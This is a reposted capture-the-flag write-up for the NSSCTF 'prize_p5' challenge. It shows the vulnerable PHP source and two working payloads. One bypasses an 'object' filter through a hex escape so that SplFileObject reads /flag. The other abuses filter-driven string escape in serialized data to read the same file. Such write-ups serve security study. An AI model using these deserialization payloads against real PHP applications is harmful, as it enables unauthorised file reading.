当前位置:网站首页>NSSCTF prize_ p5

NSSCTF prize_ p5

2022-06-09 02:02:00 I·CE

Source code 

<?php
error_reporting(0);
 
class catalogue{
    
    public $class;
    public $data;
    public function __construct()
    {
    
        $this->class = "error";
        $this->data = "hacker";
    }
    public function __destruct()
    {
    
        echo new $this->class($this->data);
    }
}
class error{
    
    public function __construct($OTL)
    {
    
        $this->OTL = $OTL;
        echo ("hello ".$this->OTL);
    }
}
class escape{
                                                                       
    public $name = 'OTL';                                                 
    public $phone = '123666';                                             
    public $email = '[email protected]';                          
}
function abscond($string) {
    
    $filter = array('NSS', 'CTF', 'OTL_QAQ', 'hello');
    $filter = '/' . implode('|', $filter) . '/i';
    return preg_replace($filter, 'hacker', $string);
}
if(isset($_GET['cata'])){
    
    if(!preg_match('/object/i',$_GET['cata'])){
    
        unserialize($_GET['cata']);
    }
    else{
    
        $cc = new catalogue(); 
        unserialize(serialize($cc));           
    }    
    if(isset($_POST['name'])&&isset($_POST['phone'])&&isset($_POST['email'])){
    
        if (preg_match("/flag/i",$_POST['email'])){
    
            die("nonono,you can not do that!");
        }
        $abscond = new escape();
        $abscond->name = $_POST['name'];
        $abscond->phone = $_POST['phone'];
        $abscond->email = $_POST['email'];
        $abscond = serialize($abscond);
        $escape = get_object_vars(unserialize(abscond($abscond)));
        if(is_array($escape['phone'])){
    
        echo base64_encode(file_get_contents($escape['email']));
        }
        else{
    
            echo "I'm sorry to tell you that you are wrong";
        }
    }
}
else{
    
    highlight_file(__FILE__);
}
?>

Class name can be used \ Hexadecimal characters Bypass 

?cata=O:9:"catalogue":2:{s:5:"class";S:13:"SplFile\4fbject";s:4:"data";s:5:"/flag";}

String escape :

?cata=CTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFhellohello";s:5:"phone";a:1:{i:0;i:1;}s:5:"email";s:5:"/flag";}
ctf...hello Switch to hacker Less 53 A string , Add later , from "; From the beginning to the end } altogether 53 individual
原网站

版权声明
本文为[I·CE]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/159/202206081420201182.html

边栏推荐

猜你喜欢

随机推荐